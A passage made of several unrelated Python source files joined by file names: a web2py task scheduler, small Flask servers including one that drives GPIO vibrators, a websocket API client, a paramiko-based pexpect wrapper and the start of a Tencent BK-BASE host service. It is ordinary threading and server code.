ticker, and 5 loops passed without reassigning tasks, # let's do that and loop again self.wrapped_assign_tasks(db) return None # ready to process something grabbed = db( (st.assigned_worker_name == self.worker_name) & (st.status == ASSIGNED) ) task = grabbed.select(limitby=(0, 1), orderby=st.next_run_time).first() if task: task.update_record(status=RUNNING, last_run_time=now) # noone will touch my task! db.commit() logger.debug(' work to do %s', task.id) else: if self.is_a_ticker and self.greedy: # there are other tasks ready to be assigned logger.info('TICKER: greedy loop') self.wrapped_assign_tasks(db) else: logger.info('nothing to do') return None times_run = task.times_run + 1 if task.cronline: cron_recur = CronParser(task.cronline, now.replace(second=0)) next_run_time = cron_recur.get_next() elif not task.prevent_drift: next_run_time = task.last_run_time + datetime.timedelta( seconds=task.period ) else: # calc next_run_time based on available slots # see #1191 next_run_time = task.start_time secondspassed = (now - next_run_time).total_seconds() steps = secondspassed // task.period + 1 next_run_time += datetime.timedelta(seconds=task.period * steps) if times_run < task.repeats or task.repeats == 0: # need to run (repeating task) run_again = True else: # no need to run again run_again = False run_id = 0 while True and not self.discard_results: logger.debug(' new scheduler_run record') try: run_id = db.scheduler_run.insert( task_id=task.id, status=RUNNING, start_time=now, worker_name=self.worker_name) db.commit() break except: time.sleep(0.5) db.rollback() logger.info('new task %(id)s "%(task_name)s"' ' %(application_name)s.%(function_name)s' % task) return Task( app=task.application_name, function=task.function_name, timeout=task.timeout, args=task.args, # in json vars=task.vars, # in json task_id=task.id, run_id=run_id, run_again=run_again, next_run_time=next_run_time, times_run=times_run, stop_time=task.stop_time, retry_failed=task.retry_failed, times_failed=task.times_failed, sync_output=task.sync_output, uuid=task.uuid) def wrapped_report_task(self, task, task_report): """Commodity function to call `report_task` and trap exceptions. If an exception is raised, assume it happened because of database contention and retries `pop_task` after 0.5 seconds """ db = self.db while True: try: self.report_task(task, task_report) db.commit() break except: self.w_stats.errors += 1 db.rollback() logger.error(' error storing result') time.sleep(0.5) def report_task(self, task, task_report): """Take care of storing the result according to preferences. Deals with logic for repeating tasks. """ db = self.db now = self.now() st = db.scheduler_task sr = db.scheduler_run if not self.discard_results: if task_report.result != 'null' or task_report.tb: # result is 'null' as a string if task completed # if it's stopped it's None as NoneType, so we record # the STOPPED "run" anyway logger.debug(' recording task report in db (%s)', task_report.status) db(sr.id == task.run_id).update( status=task_report.status, stop_time=now, run_result=task_report.result, run_output=task_report.output, traceback=task_report.tb) else: logger.debug(' deleting task report in db because of no result') db(sr.id == task.run_id).delete() # if there is a stop_time and the following run would exceed it is_expired = (task.stop_time and task.next_run_time > task.stop_time and True or False) status = (task.run_again and is_expired and EXPIRED or task.run_again and not is_expired and QUEUED or COMPLETED) if task_report.status == COMPLETED: d = dict(status=status, next_run_time=task.next_run_time, times_run=task.times_run, times_failed=0 ) db(st.id == task.task_id).update(**d) if status == COMPLETED: self.update_dependencies(db, task.task_id) else: st_mapping = {'FAILED': 'FAILED', 'TIMEOUT': 'TIMEOUT', 'STOPPED': 'FAILED'}[task_report.status] status = (task.retry_failed and task.times_failed < task.retry_failed and QUEUED or task.retry_failed == -1 and QUEUED or st_mapping) db(st.id == task.task_id).update( times_failed=st.times_failed + 1, next_run_time=task.next_run_time, status=status ) logger.info('task completed (%s)', task_report.status) def update_dependencies(self, db, task_id): """Unblock execution paths for Jobs.""" db(db.scheduler_task_deps.task_child == task_id).update(can_visit=True) def adj_hibernation(self): """Used to increase the "sleep" interval for DISABLED workers.""" if self.w_stats.status == DISABLED: wk_st = self.w_stats.sleep hibernation = wk_st + HEARTBEAT if wk_st < MAXHIBERNATION else MAXHIBERNATION self.w_stats.sleep = hibernation def send_heartbeat(self, counter): """Coordination among available workers. It: - sends the heartbeat - elects a ticker among available workers (the only process that effectively dispatch tasks to workers) - deals with worker's statuses - does "housecleaning" for dead workers - triggers tasks assignment to workers """ if not self.db_thread: logger.debug('thread building own DAL object') self.db_thread = DAL( self.db._uri, folder=self.db._adapter.folder) self.define_tables(self.db_thread, migrate=False) try: db = self.db_thread sw, st = db.scheduler_worker, db.scheduler_task now = self.now() # record heartbeat mybackedstatus = db(sw.worker_name == self.worker_name).select().first() if not mybackedstatus: sw.insert(status=ACTIVE, worker_name=self.worker_name, first_heartbeat=now, last_heartbeat=now, group_names=self.group_names, worker_stats=self.w_stats) self.w_stats.status = ACTIVE self.w_stats.sleep = self.heartbeat mybackedstatus = ACTIVE else: mybackedstatus = mybackedstatus.status if mybackedstatus == DISABLED: # keep sleeping self.w_stats.status = DISABLED logger.debug('........recording heartbeat (%s)', self.w_stats.status) db(sw.worker_name == self.worker_name).update( last_heartbeat=now, worker_stats=self.w_stats) elif mybackedstatus == TERMINATE: self.w_stats.status = TERMINATE logger.debug("Waiting to terminate the current task") self.give_up() elif mybackedstatus == KILL: self.w_stats.status = KILL self.die() return else: if mybackedstatus == STOP_TASK: logger.info('Asked to kill the current task') self.terminate_process() logger.debug('........recording heartbeat (%s)', self.w_stats.status) db(sw.worker_name == self.worker_name).update( last_heartbeat=now, status=ACTIVE, worker_stats=self.w_stats) self.w_stats.sleep = self.heartbeat # re-activating the process if self.w_stats.status != RUNNING: self.w_stats.status = ACTIVE self.do_assign_tasks = False if counter % 5 == 0 or mybackedstatus == PICK: try: # delete dead workers expiration = now - datetime.timedelta( seconds=self.heartbeat * 3) departure = now - datetime.timedelta( seconds=self.heartbeat * 3 * 15) logger.debug( ' freeing workers that have not sent heartbeat') dead_workers = db( ((sw.last_heartbeat < expiration) & (sw.status == ACTIVE)) | ((sw.last_heartbeat < departure) & (sw.status != ACTIVE)) ) dead_workers_name = dead_workers._select(sw.worker_name) db( (st.assigned_worker_name.belongs(dead_workers_name)) & (st.status == RUNNING) ).update(assigned_worker_name='', status=QUEUED) dead_workers.delete() try: self.is_a_ticker = self.being_a_ticker() except: logger.error('Error coordinating TICKER') if self.w_stats.status == ACTIVE: self.do_assign_tasks = True except: logger.error('Error cleaning up') db.commit() except: logger.error('Error retrieving status') db.rollback() self.adj_hibernation() self.sleep() def being_a_ticker(self): """Elect a TICKER process that assigns tasks to available workers. Does its best to elect a worker that is not busy processing other tasks to allow a proper distribution of tasks among all active workers ASAP """ db = self.db_thread sw = db.scheduler_worker my_name = self.worker_name all_active = db( (sw.worker_name != my_name) & (sw.status == ACTIVE) ).select(sw.is_ticker, sw.worker_name) ticker = all_active.find(lambda row: row.is_ticker is True).first() not_busy = self.w_stats.status == ACTIVE if not ticker: # if no other tickers are around if not_busy: # only if I'm not busy db(sw.worker_name == my_name).update(is_ticker=True) db(sw.worker_name != my_name).update(is_ticker=False) logger.info("TICKER: I'm a ticker") else: # I'm busy if len(all_active) >= 1: # so I'll "downgrade" myself to a "poor worker" db(sw.worker_name == my_name).update(is_ticker=False) else: not_busy = True db.commit() return not_busy else: logger.info( "%s is a ticker, I'm a poor worker" % ticker.worker_name) return False def assign_tasks(self, db): """Assign task to workers, that can then pop them from the queue. Deals with group_name(s) logic, in order to assign linearly tasks to available workers for those groups """ sw, st, sd = db.scheduler_worker, db.scheduler_task, db.scheduler_task_deps now = self.now() all_workers = db(sw.status == ACTIVE).select() # build workers as dict of groups wkgroups = {} for w in all_workers: if w.worker_stats['status'] == 'RUNNING': continue group_names = w.group_names for gname in group_names: if gname not in wkgroups: wkgroups[gname] = dict( workers=[{'name': w.worker_name, 'c': 0}]) else: wkgroups[gname]['workers'].append( {'name': w.worker_name, 'c': 0}) # set queued tasks that expired between "runs" (i.e., you turned off # the scheduler): then it wasn't expired, but now it is db( (st.status.belongs((QUEUED, ASSIGNED))) & (st.stop_time < now) ).update(status=EXPIRED) # calculate dependencies deps_with_no_deps = db( (sd.can_visit == False) & (~sd.task_child.belongs( db(sd.can_visit == False)._select(sd.task_parent) ) ) )._select(sd.task_child) no_deps = db( (st.status.belongs((QUEUED, ASSIGNED))) & ( (sd.id == None) | (st.id.belongs(deps_with_no_deps)) ) )._select(st.id, distinct=True, left=sd.on( (st.id == sd.task_parent) & (sd.can_visit == False) ) ) all_available = db( (st.status.belongs((QUEUED, ASSIGNED))) & (st.next_run_time <= now) & (st.enabled == True) & (st.id.belongs(no_deps)) ) limit = len(all_workers) * (50 / (len(wkgroups) or 1)) # if there are a moltitude of tasks, let's figure out a maximum of # tasks per worker. This can be further tuned with some added # intelligence (like esteeming how many tasks will a worker complete # before the ticker reassign them around, but the gain is quite small # 50 is a sweet spot also for fast tasks, with sane heartbeat values # NB: ticker reassign tasks every 5 cycles, so if a worker completes # its 50 tasks in less than heartbeat*5 seconds, # it won't pick new tasks until heartbeat*5 seconds pass. # If a worker is currently elaborating a long task, its tasks needs to # be reassigned to other workers # this shuffles up things a bit, in order to give a task equal chances # to be executed # let's freeze it up db.commit() x = 0 for group in wkgroups.keys(): tasks = all_available(st.group_name == group).select( limitby=(0, limit), orderby=st.next_run_time) # let's break up the queue evenly among workers for task in tasks: x += 1 gname = task.group_name ws = wkgroups.get(gname) if ws: counter = 0 myw = 0 for i, w in enumerate(ws['workers']): if w['c'] < counter: myw = i counter = w['c'] assigned_wn = wkgroups[gname]['workers'][myw]['name'] d = dict( status=ASSIGNED, assigned_worker_name=assigned_wn ) db( (st.id == task.id) & (st.status.belongs((QUEUED, ASSIGNED))) ).update(**d) wkgroups[gname]['workers'][myw]['c'] += 1 db.commit() # I didn't report tasks but I'm working nonetheless!!!! if x > 0: self.w_stats.empty_runs = 0 self.w_stats.queue = x self.w_stats.distribution = wkgroups self.w_stats.workers = len(all_workers) # I'll be greedy only if tasks assigned are equal to the limit # (meaning there could be others ready to be assigned) self.greedy = x >= limit logger.info('TICKER: workers are %s', len(all_workers)) logger.info('TICKER: tasks are %s', x) def sleep(self): """Calculate the number of seconds to sleep.""" time.sleep(self.w_stats.sleep) # should only sleep until next available task def set_worker_status(self, group_names=None, action=ACTIVE, exclude=None, limit=None, worker_name=None): """Internal function to set worker's status.""" ws = self.db.scheduler_worker if not group_names: group_names = self.group_names elif isinstance(group_names, str): group_names = [group_names] if worker_name: self.db(ws.worker_name == worker_name).update(status=action) return exclusion = exclude and exclude.append(action) or [action] if not limit: for group in group_names: self.db( (ws.group_names.contains(group)) & (~ws.status.belongs(exclusion)) ).update(status=action) else: for group in group_names: workers = self.db((ws.group_names.contains(group)) & (~ws.status.belongs(exclusion)) )._select(ws.id, limitby=(0, limit)) self.db(ws.id.belongs(workers)).update(status=action) def disable(self, group_names=None, limit=None, worker_name=None): """Set DISABLED on the workers processing `group_names` tasks. A DISABLED worker will be kept alive but it won't be able to process any waiting tasks, essentially putting it to sleep. By default, all group_names of Scheduler's instantation are selected """ self.set_worker_status( group_names=group_names, action=DISABLED, exclude=[DISABLED, KILL, TERMINATE], limit=limit) def resume(self, group_names=None, limit=None, worker_name=None): """Wakes a worker up (it will be able to process queued tasks)""" self.set_worker_status( group_names=group_names, action=ACTIVE, exclude=[KILL, TERMINATE], limit=limit) def terminate(self, group_names=None, limit=None, worker_name=None): """Sets TERMINATE as worker status. The worker will wait for any currently running tasks to be executed and then it will exit gracefully """ self.set_worker_status( group_names=group_names, action=TERMINATE, exclude=[KILL], limit=limit) def kill(self, group_names=None, limit=None, worker_name=None): """Sets KILL as worker status. The worker will be killed even if it's processing a task.""" self.set_worker_status( group_names=group_names, action=KILL, limit=limit) def queue_task(self, function, pargs=[], pvars={}, **kwargs): """ Queue tasks. This takes care of handling the validation of all parameters Args: function: the function (anything callable with a __name__) pargs: "raw" args to be passed to the function. Automatically jsonified. pvars: "raw" kwargs to be passed to the function. Automatically jsonified kwargs: all the parameters available (basically, every `scheduler_task` column). If args and vars are here, they should be jsonified already, and they will override pargs and pvars Returns: a dict just as a normal validate_and_insert(), plus a uuid key holding the uuid of the queued task. If validation is not passed ( i.e. some parameters are invalid) both id and uuid will be None, and you'll get an "error" dict holding the errors found. """ if hasattr(function, '__name__'): function = function.__name__ targs = 'args' in kwargs and kwargs.pop('args') or dumps(pargs) tvars = 'vars' in kwargs and kwargs.pop('vars') or dumps(pvars) tuuid = 'uuid' in kwargs and kwargs.pop('uuid') or web2py_uuid() tname = 'task_name' in kwargs and kwargs.pop('task_name') or function immediate = 'immediate' in kwargs and kwargs.pop('immediate') or None cronline = kwargs.get('cronline') kwargs.update( function_name=function, task_name=tname, args=targs, vars=tvars, uuid=tuuid, ) if cronline: try: start_time = kwargs.get('start_time', self.now) next_run_time = CronParser(cronline, start_time).get_next() kwargs.update(start_time=start_time, next_run_time=next_run_time) except: pass if 'start_time' in kwargs and 'next_run_time' not in kwargs: kwargs.update(next_run_time=kwargs['start_time']) rtn = self.db.scheduler_task.validate_and_insert(**kwargs) if not rtn.errors: rtn.uuid = tuuid if immediate: self.db( (self.db.scheduler_worker.is_ticker == True) ).update(status=PICK) else: rtn.uuid = None return rtn def task_status(self, ref, output=False): """ Retrieves task status and optionally the result of the task Args: ref: can be - an integer : lookup will be done by scheduler_task.id - a string : lookup will be done by scheduler_task.uuid - a `Query` : lookup as you wish, e.g. :: db.scheduler_task.task_name == 'test1' output(bool): if `True`, fetch also the scheduler_run record Returns: a single Row object, for the last queued task. If output == True, returns also the last scheduler_run record. The scheduler_run record is fetched by a left join, so it can have all fields == None """ from pydal.objects import Query sr, st = self.db.scheduler_run, self.db.scheduler_task if isinstance(ref, (int, long)): q = st.id == ref elif isinstance(ref, str): q = st.uuid == ref elif isinstance(ref, Query): q = ref else: raise SyntaxError( "You can retrieve results only by id, uuid or Query") fields = [st.ALL] left = False orderby = ~st.id if output: fields = st.ALL, sr.ALL left = sr.on(sr.task_id == st.id) orderby = ~st.id | ~sr.id row = self.db(q).select( *fields, **dict(orderby=orderby, left=left, limitby=(0, 1)) ).first() if row and output: row.result = row.scheduler_run.run_result and \ loads(row.scheduler_run.run_result, object_hook=_decode_dict) or None return row def stop_task(self, ref): """Shortcut for task termination. If the task is RUNNING it will terminate it, meaning that status will be set as FAILED. If the task is QUEUED, its stop_time will be set as to "now", the enabled flag will be set to False, and the status to STOPPED Args: ref: can be - an integer : lookup will be done by scheduler_task.id - a string : lookup will be done by scheduler_task.uuid Returns: - 1 if task was stopped (meaning an update has been done) - None if task was not found, or if task was not RUNNING or QUEUED Note: Experimental """ st, sw = self.db.scheduler_task, self.db.scheduler_worker if isinstance(ref, (int, long)): q = st.id == ref elif isinstance(ref, str): q = st.uuid == ref else: raise SyntaxError( "You can retrieve results only by id or uuid") task = self.db(q).select(st.id, st.status, st.assigned_worker_name) task = task.first() rtn = None if not task: return rtn if task.status == 'RUNNING': q = sw.worker_name == task.assigned_worker_name rtn = self.db(q).update(status=STOP_TASK) elif task.status == 'QUEUED': rtn = self.db(q).update( stop_time=self.now(), enabled=False, status=STOPPED) return rtn def get_workers(self, only_ticker=False): """ Returns a dict holding `worker_name : {**columns}` representing all "registered" workers only_ticker returns only the workers running as a TICKER, if there are any """ db = self.db if only_ticker: workers = db(db.scheduler_worker.is_ticker == True).select() else: workers = db(db.scheduler_worker.id > 0).select() all_workers = {} for row in workers: all_workers[row.worker_name] = Storage( status=row.status, first_heartbeat=row.first_heartbeat, last_heartbeat=row.last_heartbeat, group_names=row.group_names, is_ticker=row.is_ticker, worker_stats=row.worker_stats ) return all_workers def main(): """ allows to run worker without python web2py.py .... by simply:: python gluon/scheduler.py """ parser = optparse.OptionParser() parser.add_option( "-w", "--worker_name", dest="worker_name", default=None, help="start a worker with name") parser.add_option( "-b", "--heartbeat", dest="heartbeat", default=10, type='int', help="heartbeat time in seconds (default 10)") parser.add_option( "-L", "--logger_level", dest="logger_level", default=30, type='int', help="set debug output level (0-100, 0 means all, 100 means none;default is 30)") parser.add_option("-E", "--empty-runs", dest="max_empty_runs", type='int', default=0, help="max loops with no grabbed tasks permitted (0 for never check)") parser.add_option( "-g", "--group_names", dest="group_names", default='main', help="comma separated list of groups to be picked by the worker") parser.add_option( "-f", "--db_folder", dest="db_folder", default='/Users/mdipierro/web2py/applications/scheduler/databases', help="location of the dal database folder") parser.add_option( "-u", "--db_uri", dest="db_uri", default='sqlite://storage.sqlite', help="database URI string (web2py DAL syntax)") parser.add_option( "-t", "--tasks", dest="tasks", default=None, help="file containing task files, must define" + "tasks = {'task_name':(lambda: 'output')} or similar set of tasks") parser.add_option( "-U", "--utc-time", dest="utc_time", default=False, help="work with UTC timestamps" ) (options, args) = parser.parse_args() if not options.tasks or not options.db_uri: print(USAGE) if options.tasks: path, filename = os.path.split(options.tasks) if filename.endswith('.py'): filename = filename[:-3] sys.path.append(path) print('importing tasks...') tasks = __import__(filename, globals(), locals(), [], -1).tasks print('tasks found: ' + ', '.join(tasks.keys())) else: tasks = {} group_names = [x.strip() for x in options.group_names.split(',')] logging.getLogger().setLevel(options.logger_level) print('groups for this worker: ' + ', '.join(group_names)) print('connecting to database in folder: ' + options.db_folder or './') print('using URI: ' + options.db_uri) db = DAL(options.db_uri, folder=options.db_folder) print('instantiating scheduler...') scheduler = Scheduler(db=db, worker_name=options.worker_name, tasks=tasks, migrate=True, group_names=group_names, heartbeat=options.heartbeat, max_empty_runs=options.max_empty_runs, utc_time=options.utc_time) signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1)) print('starting main worker loop...') scheduler.loop() if __name__ == '__main__': main()
keep_alive.py
from flask import Flask, render_template, redirect from threading import Thread import random app = Flask('') @app.route('/') def lol(): if random.randint(0,10) == 0: return redirect('https://www.youtube.com/watch?v=dQw4w9WgXcQ') else: return render_template('home.html') def run(): app.run( host='0.0.0.0', port=random.randint(2000,9000) ) def keep_alive(): ''' Creates and starts new thread that runs the function run. ''' t = Thread(target=run) t.start()
async_service.py
# -*- coding: utf-8 -*- """ Created by susy at 2020/3/16 """ from controller.base_service import BaseService from utils.caches import cache_service, get_from_cache from utils import singleton, get_now_ts, log as logger from typing import Callable, Tuple from threading import Thread from dao.models import try_release_conn THREAD_LIMIT_PARAMS = { "max": 100, "actived": 0 } @singleton class AsyncService(BaseService): def __init__(self): super().__init__() def __build_thread(self, __run: Callable): if THREAD_LIMIT_PARAMS['actived'] < THREAD_LIMIT_PARAMS['max']: THREAD_LIMIT_PARAMS['actived'] = THREAD_LIMIT_PARAMS['actived'] + 1 return Thread(target=__run) def release_thread(self): if THREAD_LIMIT_PARAMS['actived'] > 0: THREAD_LIMIT_PARAMS['actived'] = THREAD_LIMIT_PARAMS['actived'] - 1 def async_checkout_client_item(self, prefix, suffix, action: Callable[..., dict]=None, final_call: Callable=None): ctx = self key = "async:%s:%s" % (prefix, suffix) rs_key = "async:%s:rs:%s:" % (prefix, suffix) def __run(): logger.info("thread to run in.") # cache_service.rm(rs_key) rs = {} if action: try: rs = action(key, rs_key) except Exception: logger.error("exe action failed.", exc_info=True) pass self.__thread = None cache_service.rm(key) rs['end'] = 1 # cache_service.put(rs_key, rs) self.update_state(prefix, suffix, rs) if final_call: try: final_call() except Exception: pass try_release_conn() ctx.release_thread() pass __thread = self.__build_thread(__run) if __thread: not_exists = cache_service.put_on_not_exists(key, get_now_ts()) if not_exists: __thread.start() else: return {"state": "block"} else: return {"state": "block"} return {"state": "run"} def init_state(self, prefix, suffix, val): rs_key = "async:%s:rs:%s:" % (prefix, suffix) # print('async update state:', val) cache_service.replace(rs_key, val) def update_state(self, prefix, suffix, val): rs_key = "async:%s:rs:%s:" % (prefix, suffix) # print('async update state:', val) cache_service.put(rs_key, val) def checkout_key_state(self, prefix, suffix): rs_key = "async:%s:rs:%s:" % (prefix, suffix) val = cache_service.get(rs_key) # if 'end' in val and val['end'] == 1: # cache_service.rm(rs_key) return val async_service = AsyncService()
RemoteApiClient.py
from .PromiseStore import DeferredPromise, PromiseStore import websocket from threading import Thread import json class RemoteApiClient: """Provides access to Remote APIs""" def __init__(self, endpointUri): self.Promises = PromiseStore() self.Connected = DeferredPromise() self.ws = websocket.WebSocketApp(endpointUri, on_message=self._on_message, on_error=self._on_error, on_open=self._on_open) def connect(self): def run(): self.ws.run_forever() self.worker = Thread(target=run) self.worker.start() def close(self): self.ws.close() async def call(self, apiName: str, methodName: str, args=[]): await self.Connected.promise promiseId = self.Promises.create() self.ws.send(json.dumps([ apiName, "call", { "promiseId": promiseId, "methodName": methodName, "args": args, } ])) return await self.Promises.get(promiseId) def _on_open(self, ws): self.Connected.set_result(None) def _on_message(self, ws, message): msg = json.loads(message) if msg[1] == "set-promise": self._set_promise(msg[2]) def _set_promise(self, value): if value["success"]: self.Promises.complete(value["promiseId"], value["value"]) else: self.Promises.fail(value["promiseId"], value["error"]) def _on_error(self, ws, error): return def _on_close(self, ws, close_status_code, close_msg): self.Connected = DeferredPromise()
paramikospawn.py
# pylint: disable=signature-differs """Provides an interface like pexpect.spawn interface using paramiko The implementation is based on 'pexpect.popen_spawn.PopenSpawn'. """ import threading import socket import logging # CAUTION: spawnbase is not mentioned in __all__ so it is supposed to used # internally only, from pexpect.spawnbase import SpawnBase, PY3 from pexpect import EOF, TIMEOUT __copyright__ = 'Copyright (C) 2019, Nokia' logger = logging.getLogger(__name__) try: from queue import Queue, Empty # Python 3 except ImportError: from Queue import Queue, Empty # Python 2 class ParamikoSpawn(SpawnBase): """ ParamikoSpawn uses the same mechanism than *PopenSpawn* for reading and writing from/to 'socket' but instead of *subprocess.Popen* it uses *paramiko.channel.Channel* which has to be given as an argument *chan*. """ if PY3: crlf = '\n'.encode('ascii') else: crlf = '\n' def __init__(self, chan, timeout=30, maxread=40000, searchwindowsize=None, logfile=None, encoding=None, codec_errors='strict'): super(ParamikoSpawn, self).__init__( timeout=timeout, maxread=maxread, searchwindowsize=searchwindowsize, logfile=logfile, encoding=encoding, codec_errors=codec_errors) self.chan = chan self.closed = False self._buf = self.string_type() self._read_reached_eof = False self._chunk_size = 32000 self._read_queue = Queue() self._read_thread = threading.Thread(target=self._read_incoming) self._read_thread.setDaemon(True) self._read_thread.start() def read_nonblocking(self, size, timeout): if self._read_reached_eof: self.flag_eof = True raise EOF('End Of File (EOF).') if timeout == -1: timeout = self.timeout elif timeout is None: timeout = 1e6 return self._read_queue_and_buf(timeout, size) if size > 0 else '' def _read_queue_and_buf(self, timeout, size): buf = self._read_with_or_without_timeout(timeout=timeout, size=size, buf=self._buf) r, self._buf = buf[:size], buf[size:] if self._read_reached_eof and not r: self.flag_eof = True raise EOF('End-of-file from read_nonblocking') self._log(r, '_read_from_queue') return r def _read_with_or_without_timeout(self, timeout, size, buf): if not buf: try: buf = self._read_from_queue(timeout=timeout, size=size, buf=buf) except Empty: if not self._buf: raise TIMEOUT('read_nonblocking: timeout exceeded') else: buf = self._read_from_queue_until_end_or_size(buf, size) return buf def _read_from_queue(self, timeout, size, buf): incoming = self._read_queue.get(timeout=timeout) if incoming is None: self._read_reached_eof = True return buf buf += self._decoder.decode(incoming, final=False) return self._read_from_queue_until_end_or_size(buf, size) def _read_from_queue_until_end_or_size(self, buf, size): while len(buf) < size: try: incoming = self._read_queue.get_nowait() if incoming is None: self._read_reached_eof = True break else: buf += self._decoder.decode(incoming, final=False) except Empty: break return buf def _read_incoming(self): """Run in a thread to move output from the chan to a queue.""" while True: buf = b'' try: buf = self.chan.recv(32768) except socket.timeout as e: self._log(e, 'read_incoming') if not buf: # This indicates we have reached EOF self._read_queue.put(None) return self._read_queue.put(buf) def write(self, s): '''This is similar to send() except that there is no return value. ''' self.send(s) def writelines(self, sequence): '''This calls write() for each element in the sequence. The sequence can be any iterable object producing strings, typically a list of strings. This does not add line separators. There is no return value. ''' for s in sequence: self.send(s) def send(self, s): '''Send data to the Paramiko channel. Returns the number of bytes written. ''' s = self._coerce_send_string(s) self._log(s, 'send') b = self._encoder.encode(s, final=False) return self._send_in_chunks(b) def _send_in_chunks(self, b): sbytes = 0 for i in range(0, len(b), self._chunk_size): sbytes += self.chan.send(b[i:i + self._chunk_size]) return sbytes def sendline(self, s=''): '''Wraps send(), sending string ``s`` to child process, with os.linesep automatically appended. Returns number of bytes written. ''' n = self.send(s) return n + self.send(self.linesep) def wait(self): '''Not used by interactivesessions. ''' raise NotImplementedError() def kill(self, sig): '''This is used by interactivesessions but rarely. Not implementing now. ''' raise NotImplementedError() def sendeof(self): '''Closes channel.''' self.chan.close() def close(self, force=False): # pylint: disable=unused-argument logger.debug('closing ParamikoSpawn %s', self) self.sendeof() self._read_thread.join(10)
__init__.py
''' Documentation, License etc. @package PythonHostLib ''' import ConfigParser import json import atexit import time import threading import signal import sys import os from threading import Thread from VibratorManager import VibratorManager from VibratorAdapter import VibratorAdapter import GPIOController config = ConfigParser.ConfigParser() vibratorManager = VibratorManager() update_intervall = 1 sequence_time = 120 bEnd = False tThread = None lLock = threading.Lock() from flask import Flask from flask import send_from_directory app = Flask(__name__, static_url_path='/') app._static_folder = os.path.dirname(os.path.realpath(__file__)) app.debug = False @app.route("/points/<int:value>/") def setPoints(value): global lLock lLock.acquire() vibratorManager.set_points(value) lLock.release() return "1" @app.route("/points/") def getPoints(): global lLock lLock.acquire() points = vibratorManager.get_points() lLock.release() return str(points) @app.route("/config/", methods=['GET']) def getConfig(): lLock.acquire() global config data = config.get("Vibrators", "data") return data @app.route("/") def getRoot(): return app.send_static_file('frontend/index.html'); @app.route("/<path:path>") def getFile(path): root_dir = os.path.dirname(os.getcwd()) return send_from_directory('frontend', path) def readConfigFromFile(): global config config.read("playvibe_config.ini") if not config.has_section("Vibrators"): print("No vibrators were found in configuration!") print("A default vibrator will be created on pin 18.") config.add_section("Vibrators") config.set("Vibrators", "data", json.dumps([ {'name': 'Default Vibrator', 'pin': 18, 'pwm': True, 'modes': [{'mode': 'ContinuousVibrations', 'min': 0, 'max': 100}]}, ], indent=4, sort_keys=True)) vibrators = config.get("Vibrators", "data") vibrators = json.loads(vibrators) global vibratorManager vibratorManager.clear() # Process available vibrators for vibe in vibrators: vibrator = VibratorAdapter(vibe) vibratorManager.add_vibe(vibrator) def setConfig(configContent): global config config.set("Vibrators", "data", value=configContent) with open('playvibe_config.ini', 'w') as config_file: config.write(config_file) readConfigFromFile() @app.route("/config/", methods=['POST']) def setConfigOverHTTP(): configData = request.form['json'] setConfig(str(configData)) def start(): print("Starting main logic.") lLock.acquire() # Parse the configuration print("Read config.") readConfigFromFile() lLock.release() try: print("Start the flask server") app.run(host='0.0.0.0') finally: end() currentTime = 0 def periodicUpdate(): global vibratorManager global currentTime lLock.acquire() vibratorManager.update_vibes(currentTime, sequence_time) currentTime += update_intervall if currentTime >= sequence_time: currentTime = 0 lLock.release() def periodicUpdateThread(): print("Update worker has started!") while bEnd == False: periodicUpdate() time.sleep(update_intervall) print("Update worker has ended!") def end(): global config global bEnd global tThread bEnd = True print("Ending the program, write the configuration to a file") with open('playvibe_config.ini', 'w') as config_file: config.write(config_file) GPIOController.destroy() if __name__ == "__main__": GPIOController.init() tThread = Thread(target=periodicUpdateThread) tThread.start() start()
svr.py
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available. Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved. BK-BASE 蓝鲸基础平台 is licensed under the MIT License. License for BK-BASE 蓝鲸基础平台: -------------------------------------------------------------------- Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from __future__ import absolute_import, unicode_literals import logging import os import threading import time from abc import ABCMeta from multiprocessing import cpu_count from threading import BoundedSemaphore from weakref import WeakValueDictionary from dm_engine.base.common import get_ip from dm_engine.base.component import BaseComponentService from dm_engine.config import settings from dm_engine.utils.log import configure_logging logger = logging.getLogger(__name__) class SharedNamespace(object): """ Shared namespace for communication for HOSTSVR and ComponentSVR """ def __init__(self): self._sem = BoundedSemaphore(1) self._namespace = {} def set(self, key, value): self._namespace[key] = value def get(self, key): return self._namespace[key] def atomic(self): return Atomic(self._sem) class Atomic(object): def __init__(self, sem): self._sem = sem def __enter__(self): self._sem.acquire() def __exit__(self, exc_type, exc_val, exc_tb): self._sem.release() class BaseHostSvr(object): """ Host service processing standard works, such as long-time running, status reportor, etc. Another core work is keeping component services running normally. """ __metaclass__ = ABCMeta NAME = "default" def __init__(self): # SVR shared namespace, create & update operation must use SharedNamespace method. self.namespace = SharedNamespace() # [Declaration From Subclass] Logger Configuration self.log_config = None # [Declaration From Subclass] Component Services self.services = [] self.services_threads_group = WeakValueDictionary() # Machine infomation self.svr_id = "" self.svr_ip = "" self.svr_cpu_count = 1 self.svr_pid = "" # Running event represent that the service is avtive self.running = threading.Event() def setup(self): configure_logging( log_level=settings.LOG_LEVEL, log_module=self.NAME, log_dir=settings.LOG_DIR, report_sentry=settings.REPORT_SENTRY, sentry_DSN=settings.SENTRY_DSN, ) def start(self): """ Entry function """ try: self.setup() self.running.set() # Gain server ip & process id, and generate svr_id (service identifier) self.svr_ip = get_ip() self.svr_pid = os.getpid() self.svr_cpu_count = cpu_count() self.svr_id = "{}_{}".format(self.svr_ip, self.svr_pid) self.setup_services() logger.info("Start main circulation of host service.") while self.running.is_set(): logger.debug("Heartbeat from host servie...") self.handle() self.guard_services() time.sleep(1) except 